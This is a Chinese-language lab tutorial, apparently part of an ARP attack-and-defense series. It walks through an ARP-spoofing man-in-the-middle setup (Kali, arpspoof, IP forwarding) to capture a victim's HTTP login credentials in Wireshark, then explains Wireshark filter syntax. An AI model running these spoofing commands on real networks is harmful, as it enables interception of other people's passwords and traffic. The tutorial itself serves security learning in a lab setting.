ARP-WireShark截获用户数据

系列文章

ARP渗透与攻防(一)之ARP原理
ARP渗透与攻防(二)之断网攻击
ARP渗透与攻防(三)之流量分析

1.WireShark工具介绍

wireshark的官方下载网站： WireShark

wireshark是非常流行的网络封包分析软件，功能十分强大。可以截取各种网络封包，显示网络封包的详细信息。

wireshark是开源软件，可以放心使用，可以运行在Windows，linux和Mac OS上。

环境准备

kali 作为ARP攻击机，IP地址：192.168.110.26

win10 作为被攻击方，IP地址：192.168.110.11

网关（路由器），IP地址：192.168.110.1

2.ARP攻击截获密码的步骤

1.kali开启数据包转发

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.kali开启ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.11

3.kali启动Wireshark

wireshark

4.WireShark输入过滤条件

(ip.src==192.168.110.11 or ip.dst==192.168.110.11) and tcp.port==80 and http

5.靶机登录后台系统

输入账户密码登录：

6.回到kali，wireshark寻找用户的登录信息

3.WireSahrk 过滤命令讲解

1.过滤源ip，目的ip

​ 在wireshark的过滤规则框Filter中输入过滤条件。

​ 如查找目的地址为192.168.110.11的包

ip.dst==192.168.110.11

​ 查找源地址为1.1.1.1的包

ip.src==1.1.1.1

2.端口过滤

2.1把源端口和目的端口为80的都过滤出来

tcp.port==80

2.2只过滤目的端口为80的

tcp.dstport==80

2.3只过滤源端口为80的包

tcp.srcport==80

3.协议过滤

直接在Filter框中直接输入协议名即可滤

http
tcp
ssh

4.http模式过滤

4.1过滤get包

http.request.method=="GET"

4.2过滤post包

http.request.method=="POST"

5.过滤多种条件

用and连接，如过滤ip为192.168.110.11并且为http协议的

ip.src==192.168.110.11 and http